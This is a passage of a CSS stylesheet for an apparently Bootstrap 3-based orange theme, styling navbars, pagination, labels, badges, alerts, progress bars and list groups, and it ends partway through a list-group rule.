.nav-tabs-justified > li > a {
  margin-right: 0;
  border-radius: 0;
}
.nav-tabs-justified > .active > a,
.nav-tabs-justified > .active > a:hover,
.nav-tabs-justified > .active > a:focus {
  border: 1px solid #dddddd;
}
@media (min-width: 768px) {
  .nav-tabs-justified > li > a {
    border-bottom: 1px solid #dddddd;
    border-radius: 0 0 0 0;
  }
  .nav-tabs-justified > .active > a,
  .nav-tabs-justified > .active > a:hover,
  .nav-tabs-justified > .active > a:focus {
    border-bottom-color: #ffffff;
  }
}
.tab-content > .tab-pane {
  display: none;
}
.tab-content > .active {
  display: block;
}
.nav-tabs .dropdown-menu {
  margin-top: -1px;
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
.navbar {
  position: relative;
  min-height: 55px;
  margin-bottom: 20px;
  border: 1px solid transparent;
}
@media (min-width: 991px) {
  .navbar {
    border-radius: 0;
  }
}
@media (min-width: 991px) {
  .navbar-header {
    float: left;
  }
}
.navbar-collapse {
  padding-right: 20px;
  padding-left: 20px;
  overflow-x: visible;
  border-top: 1px solid transparent;
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1);
  -webkit-overflow-scrolling: touch;
}
.navbar-collapse.in {
  overflow-y: auto;
}
@media (min-width: 991px) {
  .navbar-collapse {
    width: auto;
    border-top: 0;
    box-shadow: none;
  }
  .navbar-collapse.collapse {
    display: block !important;
    height: auto !important;
    padding-bottom: 0;
    overflow: visible !important;
  }
  .navbar-collapse.in {
    overflow-y: visible;
  }
  .navbar-fixed-top .navbar-collapse,
  .navbar-static-top .navbar-collapse,
  .navbar-fixed-bottom .navbar-collapse {
    padding-right: 0;
    padding-left: 0;
  }
}
.navbar-fixed-top,
.navbar-fixed-bottom {
  position: fixed;
  right: 0;
  left: 0;
  z-index: 1030;
}
.navbar-fixed-top .navbar-collapse,
.navbar-fixed-bottom .navbar-collapse {
  max-height: 340px;
}
@media (max-device-width: 480px) and (orientation: landscape) {
  .navbar-fixed-top .navbar-collapse,
  .navbar-fixed-bottom .navbar-collapse {
    max-height: 200px;
  }
}
@media (min-width: 991px) {
  .navbar-fixed-top,
  .navbar-fixed-bottom {
    border-radius: 0;
  }
}
.navbar-fixed-top {
  top: 0;
  border-width: 0 0 1px;
}
.navbar-fixed-bottom {
  bottom: 0;
  margin-bottom: 0;
  border-width: 1px 0 0;
}
.container > .navbar-header,
.container-fluid > .navbar-header,
.container > .navbar-collapse,
.container-fluid > .navbar-collapse {
  margin-right: -20px;
  margin-left: -20px;
}
@media (min-width: 991px) {
  .container > .navbar-header,
  .container-fluid > .navbar-header,
  .container > .navbar-collapse,
  .container-fluid > .navbar-collapse {
    margin-right: 0;
    margin-left: 0;
  }
}
.navbar-static-top {
  z-index: 1000;
  border-width: 0 0 1px;
}
@media (min-width: 991px) {
  .navbar-static-top {
    border-radius: 0;
  }
}
.navbar-brand {
  float: left;
  height: 55px;
  padding: 17.5px 20px;
  font-size: 18px;
  line-height: 20px;
}
.navbar-brand:hover,
.navbar-brand:focus {
  text-decoration: none;
}
.navbar-brand > img {
  display: block;
}
@media (min-width: 991px) {
  .navbar > .container .navbar-brand,
  .navbar > .container-fluid .navbar-brand {
    margin-left: -20px;
  }
}
.navbar-toggle {
  position: relative;
  float: right;
  padding: 9px 10px;
  margin-right: 20px;
  margin-top: 10.5px;
  margin-bottom: 10.5px;
  background-color: transparent;
  background-image: none;
  border: 1px solid transparent;
  border-radius: 0;
}
.navbar-toggle:focus {
  outline: 0;
}
.navbar-toggle .icon-bar {
  display: block;
  width: 22px;
  height: 2px;
  border-radius: 1px;
}
.navbar-toggle .icon-bar + .icon-bar {
  margin-top: 4px;
}
@media (min-width: 991px) {
  .navbar-toggle {
    display: none;
  }
}
.navbar-nav {
  margin: 8.75px -20px;
}
.navbar-nav > li > a {
  padding-top: 10px;
  padding-bottom: 10px;
  line-height: 20px;
}
@media (max-width: 990px) {
  .navbar-nav .open .dropdown-menu {
    position: static;
    float: none;
    width: auto;
    margin-top: 0;
    background-color: transparent;
    border: 0;
    box-shadow: none;
  }
  .navbar-nav .open .dropdown-menu > li > a,
  .navbar-nav .open .dropdown-menu .dropdown-header {
    padding: 5px 15px 5px 25px;
  }
  .navbar-nav .open .dropdown-menu > li > a {
    line-height: 20px;
  }
  .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-nav .open .dropdown-menu > li > a:focus {
    background-image: none;
  }
}
@media (min-width: 991px) {
  .navbar-nav {
    float: left;
    margin: 0;
  }
  .navbar-nav > li {
    float: left;
  }
  .navbar-nav > li > a {
    padding-top: 17.5px;
    padding-bottom: 17.5px;
  }
}
.navbar-form {
  padding: 10px 20px;
  margin-right: -20px;
  margin-left: -20px;
  border-top: 1px solid transparent;
  border-bottom: 1px solid transparent;
  -webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  margin-top: 10.5px;
  margin-bottom: 10.5px;
}
@media (min-width: 768px) {
  .navbar-form .inputbox,
  .navbar-form select,
  .navbar-form textarea,
  .navbar-form input {
    display: inline-block;
  }
}
@media (min-width: 768px) {
  .navbar-form .form-group {
    display: inline-block;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .form-control {
    display: inline-block;
    width: auto;
    vertical-align: middle;
  }
  .navbar-form .form-control-static {
    display: inline-block;
  }
  .navbar-form .input-group {
    display: inline-table;
    vertical-align: middle;
  }
  .navbar-form .input-group .input-group-addon,
  .navbar-form .input-group .input-group-btn,
  .navbar-form .input-group .form-control {
    width: auto;
  }
  .navbar-form .input-group > .form-control {
    width: 100%;
  }
  .navbar-form .control-label {
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .radio,
  .navbar-form .checkbox {
    display: inline-block;
    margin-top: 0;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .radio label,
  .navbar-form .checkbox label {
    padding-left: 0;
  }
  .navbar-form .radio input[type="radio"],
  .navbar-form .checkbox input[type="checkbox"] {
    position: relative;
    margin-left: 0;
  }
  .navbar-form .has-feedback .form-control-feedback {
    top: 0;
  }
}
@media (max-width: 990px) {
  .navbar-form .form-group {
    margin-bottom: 5px;
  }
  .navbar-form .form-group:last-child {
    margin-bottom: 0;
  }
}
@media (min-width: 991px) {
  .navbar-form {
    width: auto;
    padding-top: 0;
    padding-bottom: 0;
    margin-right: 0;
    margin-left: 0;
    border: 0;
    -webkit-box-shadow: none;
    box-shadow: none;
  }
}
.navbar-nav > li > .dropdown-menu {
  margin-top: 0;
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
.navbar-fixed-bottom .navbar-nav > li > .dropdown-menu {
  margin-bottom: 0;
  border-top-left-radius: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.navbar-btn {
  margin-top: 10.5px;
  margin-bottom: 10.5px;
}
.navbar-btn.btn-sm {
  margin-top: 12.5px;
  margin-bottom: 12.5px;
}
.navbar-btn.btn-xs {
  margin-top: 16.5px;
  margin-bottom: 16.5px;
}
.navbar-text {
  margin-top: 17.5px;
  margin-bottom: 17.5px;
}
@media (min-width: 991px) {
  .navbar-text {
    float: left;
    margin-right: 20px;
    margin-left: 20px;
  }
}
@media (min-width: 991px) {
  .navbar-left {
    float: left !important;
  }
  .navbar-right {
    float: right !important;
    margin-right: -20px;
  }
  .navbar-right ~ .navbar-right {
    margin-right: 0;
  }
}
.navbar-default {
  background-color: #ff8800;
  border-color: #e67a00;
}
.navbar-default .navbar-brand {
  color: #ffffff;
}
.navbar-default .navbar-brand:hover,
.navbar-default .navbar-brand:focus {
  color: #e6e6e6;
  background-color: transparent;
}
.navbar-default .navbar-text {
  color: #ffffff;
}
.navbar-default .navbar-nav > li > a {
  color: #ffffff;
}
.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-nav > .disabled > a,
.navbar-default .navbar-nav > .disabled > a:hover,
.navbar-default .navbar-nav > .disabled > a:focus {
  color: #cccccc;
  background-color: transparent;
}
.navbar-default .navbar-nav > .open > a,
.navbar-default .navbar-nav > .open > a:hover,
.navbar-default .navbar-nav > .open > a:focus {
  color: #ffffff;
  background-color: transparent;
}
@media (max-width: 990px) {
  .navbar-default .navbar-nav .open .dropdown-menu > li > a {
    color: #ffffff;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #cccccc;
    background-color: transparent;
  }
}
.navbar-default .navbar-toggle {
  border-color: #ff8800;
}
.navbar-default .navbar-toggle:hover,
.navbar-default .navbar-toggle:focus {
  background-color: #ff8800;
}
.navbar-default .navbar-toggle .icon-bar {
  background-color: #ffffff;
}
.navbar-default .navbar-collapse,
.navbar-default .navbar-form {
  border-color: #e67a00;
}
.navbar-default .navbar-link {
  color: #ffffff;
}
.navbar-default .navbar-link:hover {
  color: #ffffff;
}
.navbar-default .btn-link {
  color: #ffffff;
}
.navbar-default .btn-link:hover,
.navbar-default .btn-link:focus {
  color: #ffffff;
}
.navbar-default .btn-link[disabled]:hover,
fieldset[disabled] .navbar-default .btn-link:hover,
.navbar-default .btn-link[disabled]:focus,
fieldset[disabled] .navbar-default .btn-link:focus {
  color: #cccccc;
}
.navbar-inverse {
  background-color: #222222;
  border-color: #080808;
}
.navbar-inverse .navbar-brand {
  color: #999999;
}
.navbar-inverse .navbar-brand:hover,
.navbar-inverse .navbar-brand:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-inverse .navbar-text {
  color: #999999;
}
.navbar-inverse .navbar-nav > li > a {
  color: #999999;
}
.navbar-inverse .navbar-nav > li > a:hover,
.navbar-inverse .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-inverse .navbar-nav > .active > a,
.navbar-inverse .navbar-nav > .active > a:hover,
.navbar-inverse .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: #080808;
}
.navbar-inverse .navbar-nav > .disabled > a,
.navbar-inverse .navbar-nav > .disabled > a:hover,
.navbar-inverse .navbar-nav > .disabled > a:focus {
  color: #444444;
  background-color: transparent;
}
.navbar-inverse .navbar-nav > .open > a,
.navbar-inverse .navbar-nav > .open > a:hover,
.navbar-inverse .navbar-nav > .open > a:focus {
  color: #ffffff;
  background-color: #080808;
}
@media (max-width: 990px) {
  .navbar-inverse .navbar-nav .open .dropdown-menu > .dropdown-header {
    border-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu .divider {
    background-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a {
    color: #999999;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #444444;
    background-color: transparent;
  }
}
.navbar-inverse .navbar-toggle {
  border-color: #333333;
}
.navbar-inverse .navbar-toggle:hover,
.navbar-inverse .navbar-toggle:focus {
  background-color: #333333;
}
.navbar-inverse .navbar-toggle .icon-bar {
  background-color: #ffffff;
}
.navbar-inverse .navbar-collapse,
.navbar-inverse .navbar-form {
  border-color: #101010;
}
.navbar-inverse .navbar-link {
  color: #999999;
}
.navbar-inverse .navbar-link:hover {
  color: #ffffff;
}
.navbar-inverse .btn-link {
  color: #999999;
}
.navbar-inverse .btn-link:hover,
.navbar-inverse .btn-link:focus {
  color: #ffffff;
}
.navbar-inverse .btn-link[disabled]:hover,
fieldset[disabled] .navbar-inverse .btn-link:hover,
.navbar-inverse .btn-link[disabled]:focus,
fieldset[disabled] .navbar-inverse .btn-link:focus {
  color: #444444;
}
.breadcrumb {
  padding: 8px 15px;
  margin-bottom: 20px;
  list-style: none;
  background-color: #eeeeee;
  border-radius: 0;
}
.breadcrumb > li {
  display: inline-block;
}
.breadcrumb > li + li:before {
  padding: 0 5px;
  color: #999999;
  content: "/\00a0";
}
.breadcrumb > .active {
  color: #999999;
}
.pagination {
  display: inline-block;
  padding-left: 0;
  margin: 20px 0;
  border-radius: 0;
}
.pagination > li {
  display: inline;
}
.pagination > li > a,
.pagination > li > span {
  position: relative;
  float: left;
  padding: 6px 12px;
  margin-left: -1px;
  line-height: 1.42857143;
  color: #ff8800;
  text-decoration: none;
  background-color: #ffffff;
  border: 1px solid #dddddd;
}
.pagination > li > a:hover,
.pagination > li > span:hover,
.pagination > li > a:focus,
.pagination > li > span:focus {
  z-index: 2;
  color: #b35f00;
  background-color: #eeeeee;
  border-color: #dddddd;
}
.pagination > li:first-child > a,
.pagination > li:first-child > span {
  margin-left: 0;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.pagination > li:last-child > a,
.pagination > li:last-child > span {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.pagination > .active > a,
.pagination > .active > span,
.pagination > .active > a:hover,
.pagination > .active > span:hover,
.pagination > .active > a:focus,
.pagination > .active > span:focus {
  z-index: 3;
  color: #ffffff;
  cursor: default;
  background-color: #ff8800;
  border-color: #ff8800;
}
.pagination > .disabled > span,
.pagination > .disabled > span:hover,
.pagination > .disabled > span:focus,
.pagination > .disabled > a,
.pagination > .disabled > a:hover,
.pagination > .disabled > a:focus {
  color: #999999;
  cursor: not-allowed;
  background-color: #ffffff;
  border-color: #dddddd;
}
.pagination-lg > li > a,
.pagination-lg > li > span {
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
}
.pagination-lg > li:first-child > a,
.pagination-lg > li:first-child > span {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.pagination-lg > li:last-child > a,
.pagination-lg > li:last-child > span {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.pagination-sm > li > a,
.pagination-sm > li > span {
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
}
.pagination-sm > li:first-child > a,
.pagination-sm > li:first-child > span {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.pagination-sm > li:last-child > a,
.pagination-sm > li:last-child > span {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.pager {
  padding-left: 0;
  margin: 20px 0;
  text-align: center;
  list-style: none;
}
.pager li {
  display: inline;
}
.pager li > a,
.pager li > span {
  display: inline-block;
  padding: 5px 14px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 15px;
}
.pager li > a:hover,
.pager li > a:focus {
  text-decoration: none;
  background-color: #eeeeee;
}
.pager .next > a,
.pager .next > span {
  float: right;
}
.pager .previous > a,
.pager .previous > span {
  float: left;
}
.pager .disabled > a,
.pager .disabled > a:hover,
.pager .disabled > a:focus,
.pager .disabled > span {
  color: #999999;
  cursor: not-allowed;
  background-color: #ffffff;
}
.label {
  display: inline;
  padding: .2em .6em .3em;
  font-size: 75%;
  font-weight: 700;
  line-height: 1;
  color: #ffffff;
  text-align: center;
  white-space: nowrap;
  vertical-align: baseline;
  border-radius: .25em;
}
a.label:hover,
a.label:focus {
  color: #ffffff;
  text-decoration: none;
  cursor: pointer;
}
.label:empty {
  display: none;
}
.btn .label {
  position: relative;
  top: -1px;
}
.label-default {
  background-color: #999999;
}
.label-default[href]:hover,
.label-default[href]:focus {
  background-color: #808080;
}
.label-primary {
  background-color: #ff8800;
}
.label-primary[href]:hover,
.label-primary[href]:focus {
  background-color: #cc6d00;
}
.label-success {
  background-color: #3e9b52;
}
.label-success[href]:hover,
.label-success[href]:focus {
  background-color: #2f773f;
}
.label-info {
  background-color: #0099cc;
}
.label-info[href]:hover,
.label-info[href]:focus {
  background-color: #007399;
}
.label-warning {
  background-color: #ff8800;
}
.label-warning[href]:hover,
.label-warning[href]:focus {
  background-color: #cc6d00;
}
.label-danger {
  background-color: #cc0000;
}
.label-danger[href]:hover,
.label-danger[href]:focus {
  background-color: #990000;
}
.badge {
  display: inline-block;
  min-width: 10px;
  padding: 3px 7px;
  font-size: 12px;
  font-weight: bold;
  line-height: 1;
  color: #ffffff;
  text-align: center;
  white-space: nowrap;
  vertical-align: middle;
  background-color: #999999;
  border-radius: 0;
}
.badge:empty {
  display: none;
}
.btn .badge {
  position: relative;
  top: -1px;
}
.btn-xs .badge,
.btn-group-xs > .btn .badge {
  top: 0;
  padding: 1px 5px;
}
a.badge:hover,
a.badge:focus {
  color: #ffffff;
  text-decoration: none;
  cursor: pointer;
}
.list-group-item.active > .badge,
.nav-pills > .active > a > .badge {
  color: #ff8800;
  background-color: #ffffff;
}
.list-group-item > .badge {
  float: right;
}
.list-group-item > .badge + .badge {
  margin-right: 5px;
}
.nav-pills > li > a > .badge {
  margin-left: 3px;
}
.jumbotron {
  padding-top: 40px;
  padding-bottom: 40px;
  margin-bottom: 40px;
  color: inherit;
  background-color: #eeeeee;
}
.jumbotron h1,
.jumbotron .h1 {
  color: inherit;
}
.jumbotron p {
  margin-bottom: 20px;
  font-size: 21px;
  font-weight: 200;
}
.jumbotron > hr {
  border-top-color: #d5d5d5;
}
.container .jumbotron,
.container-fluid .jumbotron {
  padding-right: 20px;
  padding-left: 20px;
  border-radius: 0;
}
.jumbotron .container {
  max-width: 100%;
}
@media screen and (min-width: 768px) {
  .jumbotron {
    padding-top: 64px;
    padding-bottom: 64px;
  }
  .container .jumbotron,
  .container-fluid .jumbotron {
    padding-right: 80px;
    padding-left: 80px;
  }
  .jumbotron h1,
  .jumbotron .h1 {
    font-size: 63px;
  }
}
.thumbnail {
  display: block;
  padding: 4px;
  margin-bottom: 20px;
  line-height: 1.42857143;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0;
  -webkit-transition: border 0.2s ease-in-out;
  -o-transition: border 0.2s ease-in-out;
  transition: border 0.2s ease-in-out;
}
.thumbnail > img,
.thumbnail a > img {
  margin-right: auto;
  margin-left: auto;
}
a.thumbnail:hover,
a.thumbnail:focus,
a.thumbnail.active {
  border-color: #ff8800;
}
.thumbnail .caption {
  padding: 10px;
  color: #444444;
}
.alert {
  padding: 15px;
  margin-bottom: 20px;
  border: 1px solid transparent;
  border-radius: 0;
}
.alert h4 {
  margin-top: 0;
  color: inherit;
}
.alert .alert-link {
  font-weight: bold;
}
.alert > p,
.alert > ul {
  margin-bottom: 0;
}
.alert > p + p {
  margin-top: 5px;
}
.alert-dismissable,
.alert-dismissible {
  padding-right: 35px;
}
.alert-dismissable .close,
.alert-dismissible .close {
  position: relative;
  top: -2px;
  right: -21px;
  color: inherit;
}
.alert-success {
  color: #468847;
  background-color: #dff0d8;
  border-color: #d6e9c6;
}
.alert-success hr {
  border-top-color: #c9e2b3;
}
.alert-success .alert-link {
  color: #356635;
}
.alert-info {
  color: #3a87ad;
  background-color: #d9edf7;
  border-color: #bce8f1;
}
.alert-info hr {
  border-top-color: #a6e1ec;
}
.alert-info .alert-link {
  color: #2d6987;
}
.alert-warning {
  color: #c09853;
  background-color: #fcf8e3;
  border-color: #faebcc;
}
.alert-warning hr {
  border-top-color: #f7e1b5;
}
.alert-warning .alert-link {
  color: #a47e3c;
}
.alert-danger {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #ebccd1;
}
.alert-danger hr {
  border-top-color: #e4b9c0;
}
.alert-danger .alert-link {
  color: #953b39;
}
@-webkit-keyframes progress-bar-stripes {
  from {
    background-position: 40px 0;
  }
  to {
    background-position: 0 0;
  }
}
@keyframes progress-bar-stripes {
  from {
    background-position: 40px 0;
  }
  to {
    background-position: 0 0;
  }
}
.progress {
  height: 20px;
  margin-bottom: 20px;
  overflow: hidden;
  background-color: #f5f5f5;
  border-radius: 0;
  -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
  box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
}
.progress-bar {
  float: left;
  width: 0%;
  height: 100%;
  font-size: 12px;
  line-height: 20px;
  color: #ffffff;
  text-align: center;
  background-color: #ff8800;
  -webkit-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
  box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
  -webkit-transition: width 0.6s ease;
  -o-transition: width 0.6s ease;
  transition: width 0.6s ease;
}
.progress-striped .progress-bar,
.progress-bar-striped {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-size: 40px 40px;
}
.progress.active .progress-bar,
.progress-bar.active {
  -webkit-animation: progress-bar-stripes 2s linear infinite;
  -o-animation: progress-bar-stripes 2s linear infinite;
  animation: progress-bar-stripes 2s linear infinite;
}
.progress-bar-success {
  background-color: #3e9b52;
}
.progress-striped .progress-bar-success {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-info {
  background-color: #0099cc;
}
.progress-striped .progress-bar-info {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-warning {
  background-color: #ff8800;
}
.progress-striped .progress-bar-warning {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-danger {
  background-color: #cc0000;
}
.progress-striped .progress-bar-danger {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.media {
  margin-top: 15px;
}
.media:first-child {
  margin-top: 0;
}
.media,
.media-body {
  overflow: hidden;
  zoom: 1;
}
.media-body {
  width: 10000px;
}
.media-object {
  display: block;
}
.media-object.img-thumbnail {
  max-width: none;
}
.media-right,
.media > .pull-right {
  padding-left: 10px;
}
.media-left,
.media > .pull-left {
  padding-right: 10px;
}
.media-left,
.media-right,
.media-body {
  display: table-cell;
  vertical-align: top;
}
.media-middle {
  vertical-align: middle;
}
.media-bottom {
  vertical-align: bottom;
}
.media-heading {
  margin-top: 0;
  margin-bottom: 5px;
}
.media-list {
  padding-left: 0;
  list-style: none;
}
.list-group {
  padding-left: 0;
  margin-bottom: 20px;
}
.list-group-item {
  position: relative;
  display: block;
  padding: 10px 15px;
  margin-bottom: -1px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
}
.list-group-item:first-child {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
.list-group-item:last-child {
  margin-bottom: 0;
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.list-group-item.disabled,
.list-group-item.disabled:hover,
.list-group-item.disabled:focus {
  color: #999999;
  cursor: not-allowed;
  background-color: #eeeeee;
}
.list-group-item.disabled .list-group-item-heading,
.list-group-item.disabled:hover .list-group-item-heading,
.list-group-item.disabled:focus .list-group-item-heading {
  color: inherit;
}
.list-group-item.disabled .list-group-item-text,
.list-group-item.disabled:hover .list-group-item-text,
.list-group-item.disabled:focus .list-group-item-text {
  color: #999999;
}
.list-group-item.active,
.list-group-item.active:hover,
.list-group-item.active:focus {
  z-index: 2;
  color: #ffffff;
  background-color: #ff8800;
  border-color: #ff8800;
}
.list-group-item.active .list-group-item-heading,
.list-group-item.active:hover .list-group-item-heading,
.list-group-item.active:focus .list-group-item-heading,
.list-group-item.active .list-group-item-heading > small,
.list-group-item.active:hover .list-group-item-heading > small,
.list-group-item.active:focus .list-group-item-heading > small,
.list-group-item.active .list-group-item-heading > .small,
.list-group-item.active:hover .list-group-item-heading > .small,
.list-group-item.active:focus .list-group-item-heading > .small {
  color: inherit;
}
.list-group-item.active .list-group-item-text,
.list-group-item.active:hover .list-group-item-text,
.list-group-item.active:focus .list-group-item-text {
  color: #ffe7cc;
}
a.list-group-item,
button.list-group-item {
  color: #555555;
}
a.list-group-item .list-group-item-heading,
button.list-group-item .list-group-item-heading {
  color: #333333;
}
a.list-group-item:hover,
button.list-group-item:hover,
a.list-group-item:focus,
button.list-group-item:focus {
  color: #555555;
  text-decoration: none;
  background-color: #f5f5f5;
}
button.list-group-item {
  width: 100%;
  text-align: left;
}
.list-group-item-success {
  color: #468847;
  background-color: #dff0d8;
}
a.list-group-item-success,
button.list-group-item-success {
  color: #468847;
}
a.list-group-item-success .list-group-item-heading,
button.list-group-item-success .list-group-item-heading {
  color: inherit;
}
a.list-group-item-success:hover,
button.list-group-item-success:hover,
a.list-group-item-success:focus,
button.list-group-item-success:focus {
  color: #468847;
  background-color: #d0e9c6;
}
a.list-group-item-success.active,
button.list-group-item-success.active,
a.list-group-item-success.active:hover,
button.list-group-item-success.active:hover,
a.list-group-item-success.active:focus,
button.list-group-item-success.active:focus {
  color: #fff;
  background-color: #468847;
  border-color: #468847;
}
.list-group-item-info {
  color: #3a87ad;
  background-color: #d9edf7;
}
a.list-group-item-info,
button.list-group-item-info {
  color: #3a87ad;
}
a.list-group-item-info .list-group-item-heading,
button.list-group-item-info .list-group-item-heading {
  color: inherit;
}
a.list-group-item-info:hover,
button.list-group-item-info:hover,
a.list-group-item-info:focus,
button.list-group-item-info:focus {
  color: #3a87ad;
  background-color: #c4e3f3;
}
a.list-group-item-info.active,
button.list-group-item-info.active,
a.list-group-item-info.active:hover,
button.list-group-item-info.active:hover,
a.list-group-item-info.active:focus,
button.list-group-item-info.active:focus {
  color: #fff;
  background-color: #3a87ad;
  border-color: #3a87ad;
}
.list-group-item-warning {
  color: #c09853;
  background-color: #fcf8e3;
}
a.list-group-item-warning,
button.list-group-item-warning {
  color: #c09853;
}
a.list-group-item-warning .list-group-item-heading,
button.list-group-item-warning .list-group-item-heading {
  color: inherit;
}
a.list-group-item-warning:hover,
button.list-group-item-warning:hover,
a.list-group-item-warning:focus,
button.list-group-item-warning:focus {
  color: #c09853;
  background-color: #faf2cc;
}
a.list-group-item-warning.active,
button.list-group-item-warning.active,
a.list-group-item-warning.active:hover,
button.list-group-item-warning.active:hover,
a.list-group-item-warning.active:focus,
button.list-group-item-warning.active:focus {
